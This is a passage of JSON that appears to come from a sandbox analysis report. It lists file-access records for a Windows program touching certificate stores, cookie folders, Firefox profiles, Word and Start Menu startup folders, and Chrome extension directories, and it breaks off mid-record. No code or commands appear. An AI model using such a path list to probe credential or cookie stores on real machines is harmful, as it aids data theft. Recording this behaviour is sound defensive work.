"version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\SystemCertificates", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\systemcertificates", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\systemcertificates\\my", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Templates", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\templates", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\UProof", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\uproof", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Windows", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\windows", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\windows\\cookies", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\windows\\cookies\\low", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\windows\\iecompatcache", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\windows\\iecompatcache\\low", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\windows\\ietldcache", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\windows\\ietldcache\\low", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Windows\\Libraries", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\windows\\libraries", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\windows\\network shortcuts", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\windows\\printer shortcuts", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\windows\\privacie", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\windows\\privacie\\low", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Windows\\Recent", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\windows\\recent", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Windows\\SendTo", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\windows\\sendto", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\windows\\start menu", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\windows\\start menu\\programs", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\administrative tools", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Windows\\Templates", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\windows\\templates", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Windows\\Themes", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\windows\\themes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Word", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\word", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Word\\STARTUP", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\word\\startup", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Mozilla", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\mozilla", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Mozilla\\Extensions", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\mozilla\\extensions", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Mozilla\\Firefox", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\mozilla\\firefox", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\mozilla\\firefox\\crash reports", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\mozilla\\firefox\\profiles", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\p7ap74gw.default", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\mozilla\\firefox\\profiles\\p7ap74gw.default", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\p7ap74gw.default\\bookmarkbackups", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\mozilla\\firefox\\profiles\\p7ap74gw.default\\bookmarkbackups", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\p7ap74gw.default\\indexedDB", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\mozilla\\firefox\\profiles\\p7ap74gw.default\\indexeddb", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\p7ap74gw.default\\indexedDB\\moz-safe-about+home", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\mozilla\\firefox\\profiles\\p7ap74gw.default\\indexeddb\\moz-safe-about+home", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\p7ap74gw.default\\indexedDB\\moz-safe-about+home\\idb", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\mozilla\\firefox\\profiles\\p7ap74gw.default\\indexeddb\\moz-safe-about+home\\idb", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\p7ap74gw.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\mozilla\\firefox\\profiles\\p7ap74gw.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\p7ap74gw.default\\minidumps", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\mozilla\\firefox\\profiles\\p7ap74gw.default\\minidumps", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\p7ap74gw.default\\webapps", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\mozilla\\firefox\\profiles\\p7ap74gw.default\\webapps", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_br", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us", "operations": [ "access" ], 